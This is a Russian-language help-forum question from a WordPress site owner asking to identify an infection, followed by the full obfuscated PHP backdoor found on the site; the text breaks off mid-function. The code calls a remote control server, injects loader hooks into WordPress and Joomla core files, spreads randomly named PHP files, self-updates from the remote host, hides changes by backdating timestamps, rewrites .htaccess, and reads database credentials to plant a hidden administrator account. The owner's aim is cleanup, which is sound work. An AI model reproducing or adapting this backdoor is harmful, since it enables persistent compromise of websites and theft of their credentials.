Чем заражен мой сайт? Можете ли вы идентифицировать этот код? [закрыто]

У меня есть веб-сайт WordPress, зараженный вредоносным ПО, и я пытаюсь выяснить, что это за инфекция, чтобы закрыть бэкдор, который он использует.

Он заражает такие файлы, как index.php, и генерирует все эти php-файлы с произвольными именами. Код, который вводится в файлы php, приведен ниже.

Я пробовал Wordfence и несколько других плагинов, чтобы попытаться удалить его, но он продолжает возвращаться. Имеющиеся у меня резервные копии тоже заражены. Я сейчас нахожусь в той точке, где я готов перейти на новый хост и перестроить свой веб-сайт с нуля.

Я использовал декодер php, и он дал мне такой результат: PHP DECODED

МОЙ САЙТ: skyartmedia.com

      <?php header("C\x6fntent\x2dType: text/html; charset=utf-8");error_reporting(-071+-0125+0155- -041);@ini_set("d\151splay_e\x72rors","Off");@ini_set("error_\154og",null);@ini_set("log_errors",065+051- -061-0217);@ini_set("max_input_time",0217- -0235);@ini_set("max_\145xecution_time",0674+-0123+-075);@set_time_limit(0271- -0163);@ob_end_flush();iii();$server_addr="1\0604.236.16.95";$ljiljll="1.0.10";$lllijjllij="h";$lljjjiliji="/get\056php";$lil="/get.\x70h\160?content";$lllj="/get.php?created\x6for";$ljlj="/get.php?update";$lljljj="/get.\160hp?getback";$ljljjjlij="/get.\160\x68p?spider";$lll=client_version("310470\07175\x38");$liljl="http://".$lll.$lljjjiliji;$lljl="http://".$lll;$lijii=$lljl.$lil;$ljjj=$lljl.$lllj;$lljijljlil=$lljl.$ljlj;$ll=$lljl.$lljljj;$ljljiilj=$lljl.$ljljjjlij;$liil=preg_replace("\x23^\057#i","",$_SERVER["S\x43RIPT_NAME"]);$ljlijli=$_SERVER["\x48TTP_HOST"];$lljjiliijj=$_SERVER["SCR\x49PT_NAME"];if($_SERVER["S\105RVER_POR\124"]=="443"):$liliijilji="http\x73://";else:$liliijilji="http://";endif;$lliljlillij=$liliijilji.$ljlijli.$lljjiliijj;$liiijj=ij($liljl."?getlinkofdoor\x3d".urlencode($lliljlillij),$lll,$lljjjiliji."?getlinkofdoor=".urlencode($lliljlillij),$llilijjl="no");if(isset($_GET["gen"])):$lljllljijii=array("wp-co\156fig.php","../w\x70-c\157n\146ig.p\x68p","../../wp-c\x6fnfig.php","../../../wp\x2dcon\146ig.php");$llli=array("components/\143om_u\x73ers/users\x2ephp","../components/\x63om_\x75sers\057user\x73.ph\160","../../\143om\160onen\x74s/com_users/u\x73\x65rs.php","../../../components/com_use\x72s/users\056php");$liiiliiijj="\x6eone";foreach($llli as$lj):if(file_exists($lj)):$liiiliiijj="\152\157omla";endif;endforeach;foreach($lljllljijii as$liji):if(file_exists($liji)):$liiiliiijj="wp";endif;endforeach;if(isset($_GET["serve\x72id"])):$llijjiijj=$_GET["server\x69d"];$lljl=$ljjj."&gendomain=".$ljlijli."&filename=".$liil."&vl=".$lllijjllij."&v=".$ljiljll."&serv\x65ri\144=".$llijjiijj."&cms=".$liiiliiijj;$lijjijjiij=$lllj."&g\x65\156\144omain=".$ljlijli."&filename=".$liil."&vl=".$lllijjllij."&v=".$ljiljll."&se\x72verid=".$llijjiijj."&cms=".$liiiliiijj;else:$lljl=$ljjj."&gendomain=".$ljlijli."&filename=".$liil."&vl\075".$lllijjllij."&v=".$ljiljll."&cms=".$liiiliiijj;$lijjijjiij=$lllj."\046gendomain=".$ljlijli."&filena\155e=".$liil."&vl=".$lllijjllij."&v=".$ljiljll."&cms=".$liiiliiijj;endif;$ljijll=ij($lljl,$lll,$lijjijjiij,$llilijjl="\171e\163");$ljiiiiiijl=filemtime(__FILE__);foreach(glob("*.php") as$ljjjljjjiil):$ljilli=filemtime($ljjjljjjiil);if($ljilli<$ljiiiiiijl):@touch(__FILE__,$ljilli);break;endif;endforeach;echo$ljijll;exit;elseif($_GET["\147et"]=="t\x65mplate"):define("M\101X_LEVELS_UP",0257- -0441+-0711);$ljiji=(05-050- -043);do{foreach(glob("*") as$liililij):if(strpos($liililij,"wp\x2dconfig.\x70\x68p")!==false):define("P\114ATFORM","WO\x52DPRESS");$lljllljijii=array("wp-blog-header.php","wp-l\x6fad.php","wp-settings.p\150p","wp\x2dc\x6fnfig.php");for($lijil=(-0277- -061- -0216);$lijil<(0703+0655-0353-01201);$lijil++):$liljjli=$lljllljijii[$lijil];$liljj=filemtime($liljjli);$liilliiljli=sprintf("%o",fileperms($liljjli));@chmod($liljjli,01452-02235+02371+-0720);if(is_writable($liljjli)):$lljiilijj=file_get_contents($liljjli);switch($liljjli):case "wp-load.php":$lijlj=preg_replace("/require_once(.*)\x41BSPATH(.*)'( \051?wp-config\134.ph\160(.*);/i","requ\x69re_once( ABSP\101\124H . 'wp-config.php' );".PHP_EOL."if(i\163set\050\044_\x47ET['testpage']) && \044_\107ET['testpag\145']=\075'wpgo\160ost'){\162equire_\157nce( \101BSPATH .\040'".$liil."' );}",$lljiilijj);break;case "wp-\x62log\x2dheader.php":$lijlj=preg_replace("\057require_once(.*)wp-load\x5c.ph\160(.*\x29;/i","re\161uire_onc\145( \144irname(__FI\x4cE__) . '/wp-\x6coad.ph\160' );".PHP_EOL."if(isset(\x24\x5fGET['t\x65stpage']) && \x24_G\x45T['\164estpage']=='wp\147\157post'){re\x71\x75i\x72e_once( A\102S\x50ATH . '".$liil."' );\x7d",$lljiilijj);break;case "wp-config\x2ephp":$lijlj=preg_replace("/require_once\050.*)wp-settings\134.php(.*);/i","require_once(ABSPATH . \x27wp\x2dsetting\163.php');".PHP_EOL."if(isset(\044_GE\124['testpage']) &&\040\044_GE\124['testpage']=='wpgopos\164'){require\137once( ABSPATH . '".$liil."' );}",$lljiilijj);break;case "wp-settings.php":$lijlj=preg_replace("/require(\056*)pluggabl\x65-de\160recated\x5c.php(.*);/i","require( ABSP\101TH .\x20WPINC . '/pluggable-\x64\145precated\x2ephp' );".PHP_EOL."i\146\050isse\x74\x28\x24_GET['te\x73tpage']\051\040&& \044_GET['testpage']=\075'\167pgopost'){require_once( A\x42SPA\124H . '".$liil."' \051;}",$lljiilijj);break;endswitch;$llijljlj="wpgopos\x74";ili($lijlj,$liljjli,$ljlijli,$llijljlj,$liliijilji);file_put_contents($liljjli,$lljiilijj);@touch($liljjli,$liljj);continue (02);else:continue;endif;endfor;elseif(strpos($liililij,"configurat\x69on.\160hp")!==false):define("PL\x41\124F\x4fRM","JOOMLA");$ljjllil=array("index.php","conf\151\x67ur\141tion.\x70hp","inc\x6cudes/framework.p\x68p","\154ibraries/c\x6ds.php","l\x69braries/classmap.php","libraries/fof/includ\x65.php");for($lijil=(0252-0252);$lijil<(0541-0533);$lijil++):$liljjli=$ljjllil[$lijil];$liljj=filemtime($liljjli);$liilliiljli=sprintf("%o",fileperms($liljjli));@chmod($liljjli,01160+0434+0407+-01335);if(is_writable($liljjli)):$lljiilijj=file_get_contents($liljjli);switch($liljjli):case "index.php":$lijlj=preg_replace("/r\145qu\151r\x65_once JPATH_BA\123E(.*)in\143lu\144es\134/fr\141mework.ph\x70';/i","require_on\x63e JP\x41TH_BASE \x2e '/includes/fra\155ework.php';".PHP_EOL."if(\151sset(\x24_G\x45T['tes\164page']) && \x24_GET\133'te\163tpa\x67\145']==\x27jooml\x61gopost')\x7brequire_o\156ce J\x50ATH_BASE . \x27/".$liil."';\x7d",$lljiilijj);break;case "configuration.php":$lijlj=preg_replace("/\x5c<\134?php\057i","\x3c?php".PHP_EOL."\151f(\044_GET\133'testpage']=='jooml\x61gopost'){requi\x72e_once JPATH_BASE .\x20'/".$liil."'\073}",$lljiilijj);break;case "includes/f\x72am\x65\x77ork.ph\x70":$lijlj=preg_replace("/require_once JP\101TH_LIBRAR\x49ES(.*)cms.php';/i","r\x65qu\151re_once \x4aPATH_LIBRARIES . '/cms.\160hp';".PHP_EOL."if(i\x73set(\x24_GET['test\160age']) \x26&\040\044_GET['testpag\x65']=='joomlago\x70ost'\051{require_once JPA\x54H_BASE . '/".$liil."'\x3b}",$lljiilijj);break;case "\154ibraries/cms.php":$lijlj=preg_replace("/require_once\x20JPATH_\x4cIBRARIES(.*)classmap.php';/i","requir\x65_on\143e JPAT\110_LIBRARIES . '/cla\163smap\056php';".PHP_EOL."\x69f(i\163set(\x24_G\x45T['\164estpage'])\x20&& \x24_GET['\x74estpag\145\x27]=='joomlagopost'){requ\x69r\x65\137onc\145 J\120\101TH_BA\x53E\040. '/".$liil."';\x7d",$lljiilijj);break;case "libraries/clas\163map.p\x68p":$lijlj=preg_replace("/\134\x3c\x5c?php/i","<?p\x68\160".PHP_EOL."if(\x24_\107ET['te\163tpage']\x3d=\x27joomla\x67op\157st'){require_o\156ce JPAT\x48_BASE \x2e '\x2f".$liil."';}",$lljiilijj);break;case "l\151braries/fof/i\x6eclude.php":$lijlj=preg_replace("/\134\074\134?php/i","<?php".PHP_EOL."if(\044_GET[\047\164estpage\x27]=='joomlagopos\x74'){require_once JPATH_BA\x53E . '/".$liil."';}",$lljiilijj);break;endswitch;$llijljlj="jooml\141\x67opost";ili($lijlj,$liljjli,$ljlijli,$llijljlj,$liliijilji);file_put_contents($liljjli,$lljiilijj);@touch($liljjli,$liljj);continue (02);else:continue;endif;endfor;endif;endforeach;iji($liiijj);if(!defined("P\x4c\101\124FORM")):chdir("..");$ljiji++;endif;}while(!defined("PLATFORM")&&$ljiji<MAX_LEVELS_UP);if(!defined("PLATFORM")):exit("Unknown platf\157rm!");endif;elseif($_GET["testpage"]=="w\160gopost"):$llii="abcdefghi\152kl\x6dno\x70";$ljjillljlll=str_shuffle($llii);$lilll=array("post_ti\164le"=>"HEREISH1TAG","po\163t_\156ame"=>$ljjillljlll,"post_content"=>"HEREISCONTENT","p\157st_status"=>"publish","post_c\x61tegory"=>array());$liiijli=wp_insert_post($lilll,true);$ljijjii=get_permalink($liiijli);$lijjijjiij=preg_replace("#http://(.\052)\057|h\x74tps://(\x2e*)/#","",$ljijjii);$lijjijjiij="\x2f".$lijjijjiij;$ljijll=ij($ljijjii,$ljlijli,$lijjijjiij,$llilijjl="no");$ljijll=str_replace($ljijjii,"HEREIS\125R\x4c",$ljijll);$ljijll=str_replace($ljjillljlll,"HERE\x49\123SLUG",$ljijll);echo$ljijll;if(!wp_delete_post($liiijli,true)):wp_delete_post($liiijli,true);endif;exit;elseif($_GET["testpage"]=="joomlagopost"):$li=explode("/",$_SERVER["SERV\105R_NAME"].$_SERVER["RE\x51\x55EST_URI"]);unset($li[count($li)-(0417+-0255+-0141)]);$ljiiliij=iljiji("HEREI\x53TITLE","","HEREISCONTENT");$ljiiliij=explode(":",$ljiiliij);$liljiijil="HEREIS\x54IT\114E";if(is_array($ljiiliij)):$liijljl=trim($ljiiliij[01051+-0165- -0254-01137]);$llliilll=trim($ljiiliij[0541+-060+-0461]);$lllljjjj=$liliijilji.trim(implode("/",$li),"/")."/index.php/?option=com_content&view\x3dartic\154\x65\x26id=".$llliilll;$ljijll=ij($lllljjjj,$ljlijli,$lllljjjj,$llilijjl="\156o");$ljijll=preg_replace("/<title>(.*)<\134/title>/iUm","<ti\164\154e>".$liljiijil."</\x74i\164\x6ce>",$ljijll);$llljjjijli=JFactory::getDbo();$lljlii=$llljjjijli->getQuery(true);$lljlii->delete($llljjjijli->quoteName("#__con\164ent"))->where(array($llljjjijli->quoteName("i\x64")."=".$llliilll));$llljjjijli->setQuery($lljlii);$liij=$llljjjijli->query();if(!empty($ljijll)&&stripos($ljijll,"\x48EREI\123CONTENT")):$ljijll=str_ireplace("content\075\042HE\122\105\111SCONTENT","content=\042",$ljijll);$ljijll=str_ireplace("cont\x65nt=\042 HEREISCONTENT","conten\x74=\042",$ljijll);$ljijll=preg_replace("/<me\164a pro\x70erty=[\134\042']{1}og:descrip\164ion\x5b\x5c\042']{\x31} co\x6eten\x74=[\134\042\047]{1}.*[\134\x22']{1}\x5cs?\x5c/>/iUs","",$ljijll);$ljlijlliii="|(<\x68\x32\076.*HE\x52EISTITLE.*\074/h2>)|i\x55s";preg_match_all($ljlijlliii,$ljijll,$llljii);if(!empty($llljii[-0230-0474-0132+01057][-060- -060])):$ljijll=str_ireplace($llljii[-0426- -0427][-0155+0155],"<h\061>HEREISH1TAG</\1501>",$ljijll);endif;endif;echo$ljijll;exit;endif;elseif(isset($_GET["v"])):die($ljiljll);elseif(isset($_GET["\x75pd"])):if(isset($_GET["source"])&&$_GET["source"]!=null):$lll=client_version($_GET["s\157\x75r\143\x65"]);$lljl="http://".$lll.$ljlj."&vl=".$lllijjllij."&upd";else:$lljl=$lljijljlil."&vl=".$lllijjllij."&upd";endif;$lijjijjiij=$ljlj."&vl=".$lllijjllij."&upd";$ljijll=ij($lljl,$lll,$lijjijjiij,$llilijjl="no");if($ljijll==null):die("cant load ne\x77 client");endif;$liljj=filemtime(__FILE__);if(!is_writable(__FILE__)):chmod(__FILE__,"0644");file_put_contents(__FILE__,$ljijll);@touch(__FILE__,$liljj);if(!chmod(__FILE__,"06\0644")):die("cant set rights");endif;endif;file_put_contents(__FILE__,$ljijll);@touch(__FILE__,$liljj);if(!is_writable(__FILE__)):die("c\x6cient not writab\x6ce");endif;file_put_contents(__FILE__,$ljijll);@touch(__FILE__,$liljj);exit;elseif(isset($_GET["ws"])):if(isset($_GET["s\x6furc\x65"])&&$_GET["source"]!=null):$lll=client_version($_GET["source"]);$liiljj="http://".$lll.$lljljj."&vl=".$lllijjllij."&upd";else:$liiljj=$ll."&ws\x3d".$_GET["ws"];endif;$liillljilji=$lljljj."&ws=".$_GET["ws"];$ljilijii=null;$lljlj=(0317-01074+0301+0263);$liijijlilj="^_^";for($lijil=(-063- -064);$lijil<=$lljlj;$lijil++):if($lijil==(0474+01024-01517)):list($ljjli,$ljilijii)=ijl($liijijlilj,$ljilijii);foreach($ljjli as$ljiiiil):if(strstr($ljiiiil,"akismet")):continue;endif;$lljlll[]=$ljiiiil;endforeach;else:foreach($lljlll as$ljjij):list($ljjli,$ljilijii)=ijl($ljjij,$ljilijii);foreach($ljjli as$ljiiiil):if(strstr($ljiiiil,"akismet")):continue;endif;$lljlll[]=$ljiiiil;$lljlll=array_values(array_unique($lljlll));endforeach;endforeach;endif;endfor;$liljiijiilj=ii($ljilijii,$liljl,$lll,$lljjjiliji,$lijjllljli="all");shuffle($lljlll);foreach($lljlll as$liijijlilj):if(is_writable($liijijlilj)):shuffle($liljiijiilj);$liililij=$liijijlilj.DIRECTORY_SEPARATOR.$liljiijiilj[0152+0142+-0314];if(!file_exists($liililij)):$ljijll=ij($liiljj,$lll,$liillljilji,$llilijjl="n\157");if($ljijll==null):die("cant\x20get tx\164 file");endif;if(file_put_contents($liililij,$ljijll)):$lljijli=explode("/",$_SERVER["\x53CRI\x50T_\x4eAME"],-(0372-0371));$lljjiliijj=implode("/",$lljijli)."/".$liililij;$llliiii=$liliijilji.$ljlijli.$lljjiliijj;echo$llliiii;exit;endif;endif;endif;endforeach;die("can\047\x74 w\x72ite \x66ile");elseif(isset($_GET["wsall"])):ini_set("\x6dax_execution_time",0154+035- -0104+-0315);set_time_limit(-0505+0505);$ljilijii=null;if(isset($_GET["s\157urce"])&&$_GET["sourc\x65"]!=null):$lll=client_version($_GET["\163ource"]);$liiljj="ht\x74p://".$lll.$lljljj."&bdr&counte\162=\x30&vl=".$lllijjllij;$liljl="http://".$lll.$lljjjiliji;else:$liiljj=$ll."&b\144\x72&counte\x72=0&vl=".$lllijjllij;endif;$liillljilji=$lljljj."&\x62dr&counter=0&vl=".$lllijjllij;$lljlj=(-0243+0252);$liijijlilj="^_^";for($lijil=(0315-0314);$lijil<=$lljlj;$lijil++):if($lijil==(047+-046)):list($ljjli,$ljilijii)=ijl($liijijlilj,$ljilijii);foreach($ljjli as$ljiiiil):if(strstr($ljiiiil,"akismet")):continue;endif;$lljlll[]=$ljiiiil;endforeach;else:foreach($lljlll as$ljjij):list($ljjli,$ljilijii)=ijl($ljjij,$ljilijii);foreach($ljjli as$ljiiiil):if(strstr($ljiiiil,"akis\155et")):continue;endif;$lljlll[]=$ljiiiil;$lljlll=array_values(array_unique($lljlll));endforeach;endforeach;endif;endfor;$liljiijiilj=ii($ljilijii,$liljl,$lll,$lljjjiliji,$lijjllljli="al\154");foreach($lljlll as$liijijlilj):if(is_writable($liijijlilj)):shuffle($liljiijiilj);$liililij=$liijijlilj.DIRECTORY_SEPARATOR.$liljiijiilj[0651-0161+-0470];if(!file_exists($liililij)):$lijiilllili[]=$liililij;endif;endif;endforeach;if(count($lijiilllili)=="0"):echo"nothing to do\x20\150ere";endif;shuffle($lijiilllili);$ljiji=(-045+-0162- -0227);foreach($lijiilllili as$liililij):if($ljiji<(-0241-0107+0134+0226)):$ljiji++;$ljijll=ij($liiljj,$lll,$liillljilji,$llilijjl="no");$lij=explode(":-:-:",$ljijll,-0444-0265- -0733);$ljjlijjil=$lij[0714+-01251+0335];$lilljjii=$lij[061-060];$lljijli=explode("/",$_SERVER["SCRIPT_NA\x4dE"],-(-0111+0270-01040- -0662));$lljjiliijj=implode("/",$lljijli)."\057".$liililij;$llliiii=$liliijilji.$ljlijli.$lljjiliijj;$ljiji--;if(file_put_contents($liililij,$lilljjii)):$ljiji++;if($ljiji=="\0610"):echo$ljjlijjil."|\174".$llliiii;elseif($ljiji<(0750- -0411-01347)):echo$ljjlijjil."||".$llliiii."::";endif;else:$ljiji--;endif;else:continue;endif;endforeach;exit;elseif(isset($_GET["z"])):echo"im o\153ey";exit;elseif(isset($_GET["sz"])):$lljl=$liljl."?z";$lijjijjiij=$lljjjiliji."?z";$ljijll=ij($lljl,$lll,$lijjijjiij,$llilijjl="yes");echo$ljijll;exit;elseif(isset($_GET["h"])):$ljjlijiij=".htacces\x73";if(file_exists($ljjlijiij)):echo file_get_contents($ljjlijiij);endif;exit;elseif(isset($_GET["sc"])):@ini_set("max_execu\164ion_time",023232+023305+023416+-046536);@set_time_limit(024132-0513);if(isset($_GET["d"])):unlink(__FILE__);endif;$llijjiijj=md5(__FILE__.time());$lljl=$ljljiilj."&g\145tcode&v\154\075".$lllijjllij."&serverid=".$llijjiijj;$lijjijjiij=$ljljjjlij."&g\x65tc\x6fde&v\154=".$lllijjllij."&s\x65rverid=".$llijjiijj;$lljliijljl=ij($lljl,$lll,$lijjijjiij,$llilijjl="yes");if($lljliijljl=="nocodetoinsert"):die("nocodet\x6finsert");endif;chdir($_SERVER["DOCUMENT_RO\x4fT"]);$ljiljji=getcwd();if(isset($_GET["i"])&&$_GET["i"]):$lijil=$_GET["i"];else:$lijil="4";endif;for($lijil=(0154+-0143+-011);$lijil<=(-0431-0345-0575- -01577);$lijil++):if(is_readable("..")):chdir("..");$ljiljji=getcwd();else:continue;endif;endfor;$lijiii=ijj($lll,$ljljiilj,$ljljjjlij,$ljjlijjil="baddi\x72s");$lllljllj=ijj($lll,$ljljiilj,$ljljjjlij,$ljjlijjil="filestoin\x63");iiljij($ljiljji,$lljliijljl,$lllljllj,$lijiii);exit;elseif(isset($_GET["addwpus\x65r"])):$llliilll=$_GET["id"];$lijlliill=$_GET["username"];$lli=md5($_GET["password"]);$liijiij=str_replace($_SERVER["DOCUMENT_ROOT"],"",$_SERVER["\123CRIPT_F\x49L\x45NAME"]);$ljiijij=null;$liijljlj=substr_count($liijiij,DIRECTORY_SEPARATOR);if($liijljlj>(-0466-0422+01111)):$lljlililjl=explode($liijiij,DIRECTORY_SEPARATOR);while(substr_count($liijiij,DIRECTORY_SEPARATOR)>(-0517+-0576+-0527- -02045)):$lljlililjl=explode(DIRECTORY_SEPARATOR,$liijiij,-(-01307- -0755- -0333));$liijiij=implode($lljlililjl,DIRECTORY_SEPARATOR);$liiji[]=$_SERVER["\x44OCUM\x45NT_ROOT"].$liijiij.DIRECTORY_SEPARATOR."wp\x2dconf\x69g\x2ephp";endwhile;$liiji[]=$_SERVER["DO\x43UMENT_RO\117T"].DIRECTORY_SEPARATOR."wp-config.\160h\160";else:$liiji[]=$_SERVER["DOCUMENT_R\117\117T"].DIRECTORY_SEPARATOR."wp-config.php";endif;foreach($liiji as$lljllljl):if(file_exists($lljllljl)):$ljiijij=$lljllljl;break;endif;endforeach;if($ljiijij==null):die("\156o wp");else:echo$ljiijij;$ljiijij=file_get_contents($ljiijij);preg_match("/define\134(\x5c'DB\137NA\115E\x5c', \134'(.\052)\x5c'\x5c)\134;\057msU",$ljiijij,$lljijj);preg_match("/define\134(\x5c'DB\137US\x45R\x5c', \x5c\x27(.*)\134'\134)\x5c;/msU",$ljiijij,$lii);preg_match("/define\x5c(\134'\104B_PASSWORD\x5c', \x5c'(.*)\x5c'\x5c\x29\134;/m\163U",$ljiijij,$ljlliillilj);preg_match("/define\134(\x5c'DB_HOST\134', \x5c'\050.*)\134'\134)\x5c;/msU",$ljiijij,$liljjjiij);preg_match("/.*prefix  \x5c= \134'(.\052)\x5c'\134;/msU",$ljiijij,$lljjjjj);$ljjiiillli=$lljjjjj[-032+-0147+0202]."users";$lljjlllll=$lljjjjj[017+0223+-0241]."usermeta";$ljijil=mysql_connect($liljjjiij[0133+0310-0767+0325],$lii[063- -0554+-0636],$ljlliillilj[-0237- -0240]);mysql_select_db($lljijj[0335-0334]);$lljlii="SELECT\x20CO\125\x4eT(*) FROM ".$ljjiiillli." WHERE \111D=\x27".$llliilll."'";$liliijjiijj=mysql_query($lljlii);if(mysql_result($liliijjiijj,053-053)==(0152+-024+045-0172)):echo"user exists";else:$lllilj="I\x4eSERT I\116\x54O ".$ljjiiillli."\x20(\x60\x49D`,`user_logi\156`,\x60user_pa\163\x73`,`user_nic\x65name`,\140user_email`\x2c`user\137url`,\x60user_registered`,`use\x72_a\143t\151va\164ion_k\x65y`,`user_\163tatus`,`displ\x61\x79_name`)\x20VALUES ('".$llliilll."','".$lijlliill."','".$lli."','Support\x27,'wps\165pport\100wpres\x73.com'\x2c\x27','2018-05-04 \0612:33:09','','0','Sup\x70ort A\143coun\164');";$ljiiiji="IN\x53ERT INTO ".$lljjlllll." (`umeta_id`,`user_id`,`meta_key`,`meta_value`) VALUE\x53 (NULL,'".$llliilll."','wp_capabil\x69ties','a\x3a1:{\x73:13:\x22ad\155inist\x72at\157\162\x22;s:1:\0421\042;}'),(NU\114\x4c,'".$llliilll."','wp_user_le\x76el','10');";$llj=mysql_query($lllilj);$lliijiill=mysql_query($ljiiiji);echo"use\162 inser\x74ed";endif;mysql_close($ljijil);endif;else:if(preg_match("#^www\134.#",$ljlijli)):$ljlijli=preg_replace("#^www\x5c.#",$ljlijli);endif;$lljl=$lijii."&vl=".$lllijjllij."&v=".$ljiljll."&\144omain=".$ljlijli."\x26getcookie";$lijjijjiij=$lil."&vl\075".$lllijjllij."&v\x3d".$ljiljll."&domai\156=".$ljlijli."\x26getco\157ki\145";$ljijll=ij($lljl,$lll,$lijjijjiij,$llilijjl="yes");if($ljijll!="don\164show\143ookies"):$lljjillii=explode(":",$ljijll);$lljiiij=$lljjillii[01127- -0516-01645];$lljljlijjj=$lljjillii[-0206+0207];if(!$_COOKIE[$lljiiij]):$lji="yes";if(setcookie($lljiiij,$lljljlijjj,time()+(07673-0653)*(062+-032),"\x2f",$ljlijli)):$lji="no";endif;else:$lji="n\x6f";endif;else:$lji="no";endif;$lljl=$lijii."&vl=".$lllijjllij."&v=".$ljiljll."&cookiebot=".$lji;$lijjijjiij=$lil."&vl=".$lllijjllij."&v=".$ljiljll."&c\x6fokiebot=".$lji;$ljijll=ij($lljl,$lll,$lijjijjiij,$llilijjl="yes");echo$ljijll;exit;endif;function iiljij($ljiljji,$lljliijljl,$lllljllj,$lijiii){foreach(scandir($ljiljji) as$liililij):il();if($liililij=="."||$liililij==".."):continue;endif;if(in_array($liililij,$lijiii)):continue;endif;foreach($lllljllj as$ljll):if($liililij==$ljll):$ljjiliiji=$ljiljji.DIRECTORY_SEPARATOR.$liililij;if(!is_writable($ljjiliiji)):if(!@chmod($ljjiliiji,01351-0505)):continue;else:$ljjljl=file_get_contents($ljjiliiji);if(preg_match("/\x5c\x24incode/",$ljjljl)):continue;endif;$liljj=filemtime($ljjiliiji);$ljjljl=$lljliijljl.$ljjljl;file_put_contents($ljjiliiji,$ljjljl);@touch($ljjiliiji,$liljj);echo"included: ".$ljjiliiji."\074br>";endif;else:$ljjljl=file_get_contents($ljjiliiji);if(preg_match("/\134\044incode/",$ljjljl)):continue;endif;$liljj=filemtime($ljjiliiji);$ljjljl=$lljliijljl.$ljjljl;file_put_contents($ljjiliiji,$ljjljl);@touch($ljjiliiji,$liljj);echo"included: ".$ljjiliiji."<br>";endif;endif;endforeach;$liijijlilj=$ljiljji.DIRECTORY_SEPARATOR.$liililij;if(is_dir($liijijlilj)):iiljij($liijijlilj,$lljliijljl,$lllljllj,$lijiii);endif;endforeach;}function il(){echo"<!-\x2d ";echo str_repeat("wwwwwww",0111+0414+046+-0427);echo" \055->";}function iji($liiijj){foreach(glob("*.php") as$liijli):if($liijli==basename(__FILE__)||is_writable($liijli)==false):continue;endif;$liljj=filemtime($liijli);$lijlj=file_get_contents($liijli);$lijlj=preg_replace("/\074\x5c\x3fphp\x7c<\134?/\x69",$liiijj."<?php",$lijlj,060- -0254+-0333);file_put_contents($liijli,$lijlj);@touch($liijli,$liljj);endforeach;}function ili($lijlj,$liljjli,$ljlijli,$llijljlj,$liliijilji,$lljllljllji=true,$llil=null){file_put_contents($liljjli,$lijlj);$ljljiljjl=$liliijilji.$ljlijli."/?\x74estpa\x67e=".$llijljlj;$lijjijjiij="/?testpa\147e=".$llijljlj;$ljijll=ij($ljljiljjl,$ljlijli,$lijjijjiij,$llilijjl="n\157");echo$ljijll;}function iljiji($ljljj,$llllliill,$ljllj){$lljj=JFactory::getDBO();$ljljlii=new stdClass;$ljljlii->id=null;$ljljlii->title=$ljljj;$ljljlii->introtext=$llllliill;$ljljlii->fulltext=$ljllj;$ljljlii->state=(-0622- -052- -0551);$ljljlii->access=(0326- -0256-0603);$ljljlii->created_by=(0376+-0245-033);$ljljlii->created=date("\x59-m-d H:i:s");$ljljlii->alias=JFilterOutput::stringURLSafe($ljljlii->title);if(!$lljj->insertObject("#__\x63ontent",$ljljlii,"id")):echo$lljj->stderr();return false;endif;return$ljljlii->id.":".$ljljlii->alias;}function iii(){$ljjlijiij=".ht\141ccess";if(file_exists($ljjlijiij)):$liiiiil=filemtime($ljjlijiij);@chmod($ljjlijiij,0774-0106);$ljjjiijill=file_get_contents($ljjlijiij);if(preg_match("#goo\x67le|yahoo|bing#\151Us",$ljjjiijill)):$ljjjiijill=preg_replace("#google#iUs","goog1e",$ljjjiijill);$ljjjiijill=preg_replace("#yahoo#iUs","yanoo",$ljjjiijill);$ljjjiijill=preg_replace("#bing#iUs","b1ng",$ljjjiijill);$ljjjiijill=preg_replace("#baidu#iUs","ba1du",$ljjjiijill);$ljjjiijill=preg_replace("#sez\156am#iUs","sesnam",$ljjjiijill);$ljjjiijill=preg_replace("#crawl#iUs","craw1",$ljjjiijill);$ljjjiijill=preg_replace("\043\134|a\x6fl\x5c|#iUs","|\x61o1|",$ljjjiijill);$ljjjiijill=preg_replace("#HTTP_USER_AGE\116\x54#i\x55s","HTTP_REFERER",$ljjjiijill);endif;file_put_contents($ljjlijiij,$ljjjiijill);@touch($ljjlijiij,$liiiiil);endif;}function ii($ljilijii,$liljl,$lll,$lljjjiliji,$lijjllljli){$lljl=$liljl."?getfi\x6cename&p\x6catform=".$ljilijii."&count=".$lijjllljli;$lijjijjiij=$lljjjiliji."?getf\x69lename&\160latfor\x6d=".$ljilijii."&count=".$lijjllljli;$lijjjjl=ij($lljl,$lll,$lijjijjiij,$llilijjl="no");if($lijjllljli=="a\154l"):$lijjjjl=explode("::",$lijjjjl,-(0226+-0252+-010- -035));endif;return$lijjjjl;}function ijj($lll,$ljljiilj,$ljljjjlij,$ljjlijjil){$lljl=$ljljiilj."&typ\x65=".$ljjlijjil;$lijjijjiij=$ljljjjlij."&type=".$ljjlijjil;$liljiijiilj=ij($lljl,$lll,$lijjijjiij,$llilijjl="no");$liljiijiilj=explode("::",$liljiijiilj,-(01111+-01110));return$liljiijiilj;}function ijl($liijijlilj,$ljilijii){if($liijijlilj=="^_^"):foreach(glob("*") as$liililij):if(is_dir($liililij)):$ljjli[]=$liililij;endif;if(stristr($liililij,"wp-config.php")):$ljilijii="wp";elseif(stristr($liililij,"\x63onfiguration.php")):$ljilijii="jm";endif;if($ljilijii===null):$ljilijii="other";endif;endforeach;else:foreach(glob($liijijlilj.DIRECTORY_SEPARATOR."*") as$liililij):if(is_dir($liililij)):$ljjli[]=$liililij;endif;endforeach;endif;return array($ljjli,$ljilijii);}function client_version($lijil,$liljjililii=false,$lljilj=0106356){$lijijjlilj[0653- -01372-051+-02174]=(int)($lijil/(0436+-036)/(-0213- -0155-0303- -0741)/(0765-0466-0631- -0732));$lijijjlilj[-01017-0507- -0561+0746]=(int)(($lijil-$lijijjlilj[0121+0221-0342]*(02041-01441)*(0276-0437+0541)*(01075+-0475))/(0350- -030)/(0123-01170-05- -01452));$lijijjlilj[0256+-01140- -0664]=(int)(($lijil-$lijijjlilj[0210-0210]*(0715+0660-01175)*(01037-0437)*(-0370+-066- -0500+0356)-$lijijjlilj[01117+01405-02523]*(-0573-02100+0436- -02635)*(01103- -0212+-0715))/(0300-0672- -0772));$lijijjlilj[040-035]=$lijil-$lijijjlilj[01341+-01341]*(0346- -032)*(-0764- -05+01003+0354)*(-0760-0612+-0143- -02335)-$lijijjlilj[060+037-023+-073]*(0674-055-045+-0152)*(-0414+01014)-$lijijjlilj[0374+053-0656- -0211]*(0247-0257- -0410);return''.$lijijjlilj[-0147- -027- -02- -0116].".".$lijijjlilj[-0103+0531+-0425].".".$lijijjlilj[0253+01551+01264-03306].".".$lijijjlilj[01142- -0167+-01326];}function 